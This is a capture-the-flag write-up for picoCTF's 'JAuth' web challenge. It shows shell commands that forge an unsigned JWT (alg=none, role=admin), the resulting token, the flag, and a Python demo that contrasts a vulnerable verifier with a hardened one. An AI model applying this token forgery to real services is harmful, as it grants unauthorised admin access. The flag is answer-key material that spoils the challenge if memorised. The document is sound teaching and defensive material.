[Web] JAuth (300 pts)
Question
Most web application developers use third-party components without testing their security. Some of the past affected companies are:
Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
Mossack Fonseca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
VerticalScope (internet media company) - outdated version of vBulletin forum software used
Can you identify the components and exploit the vulnerable one? The website is running here. Can you become an admin?
You can login as test with the password Test123! to get started.
Hint
Use the web browser tools to check out the JWT cookie.
The JWT should always have two (2) '.' separators.
Solution
The challenge gave us a login page. After logging in, there was nothing interesting on the page, so I checked the login request to see what was going on. After login, I've got a user token; let's go to jwt and decode it. The notable field here is the role: I got the role of user, so what if we change it to admin?


I've tried to change the role to admin and tried again with a new token, but I failed.

Hmm, wait, I could see that the token uses the HS256 algorithm, and maybe it could lead to the JWT none algorithm vulnerability. I generated my own new token and changed two values: alg=none and role=admin
# Generate new header (JWT uses base64url without '=' padding; tr strips the padding,
# any line wrap from base64, and maps '+' '/' to '-' '_')
echo -n '{"typ":"JWT","alg":"none"}' | base64 | tr -d '=\n' | tr '+/' '-_'
=> eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
# Generate new payload
echo -n '{"auth":1674810645022,"agent":"test123","role":"admin","iat":1573358396}' | base64 | tr -d '=\n' | tr '+/' '-_'
=> eyJhdXRoIjoxNjc0ODEwNjQ1MDIyLCJhZ2VudCI6InRlc3QxMjMiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE1NzMzNTgzOTZ9
# Merged JWT: header.payload. with the signature part left empty
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjc0ODEwNjQ1MDIyLCJhZ2VudCI6InRlc3QxMjMiLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE1NzMzNTgzOTZ9.

After getting the new token, I sent the request with it. Luckily, this time I was right, and I got the flag.
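The alg=none weakness behind this solve, as an added Python example that is not part of the writeup: it rebuilds the same unsigned token the shell commands above produce, then shows a verifier that trusts the token's own alg header (the vulnerable behaviour) beside one that pins HS256 server-side and rejects an empty signature (the fix). The secret key and the claim values are constructed for the demo; the helper names are assumptions.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional


def b64url_encode(raw: bytes) -> str:
    # base64url without '=' padding, as JWT requires (the writeup strips it by hand)
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_jwt(header: dict, payload: dict, key: bytes) -> str:
    """Build a token; with alg=none the signature part is left empty, as in the writeup."""
    head = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    if header.get("alg") == "none":
        return f"{head}.{body}."
    sig = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(sig)}"


def verify_vulnerable(token: str, key: bytes) -> Optional[dict]:
    """Lets the token's own 'alg' header decide how it is checked: 'none' skips the HMAC."""
    head, body, sig = token.split(".")
    if json.loads(b64url_decode(head)).get("alg") == "none":
        return json.loads(b64url_decode(body))      # attacker-chosen claims accepted as-is
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if hmac.compare_digest(expected, b64url_decode(sig)):
        return json.loads(b64url_decode(body))
    return None


def verify_hardened(token: str, key: bytes) -> Optional[dict]:
    """Pins HS256 on the server side; the header's 'alg' is checked, never trusted."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:             # empty signature: reject immediately
        return None
    head, body, sig = parts
    if json.loads(b64url_decode(head)).get("alg") != "HS256":
        return None                                 # 'none' or any other alg is rejected
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(body))


# Constructed demo data: the secret is made up, the claims mirror the writeup's token
KEY = b"constructed-demo-secret"
CLAIMS = {"auth": 1674810645022, "agent": "test123", "role": "user", "iat": 1573358396}
FORGED = encode_jwt({"typ": "JWT", "alg": "none"}, {**CLAIMS, "role": "admin"}, KEY)
```

Running `verify_vulnerable(FORGED, KEY)` returns the admin claims while `verify_hardened(FORGED, KEY)` returns None; a properly signed HS256 token passes both.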

Flag
picoCTF{succ3ss_@u7h3nt1c@710n_bc6d9041}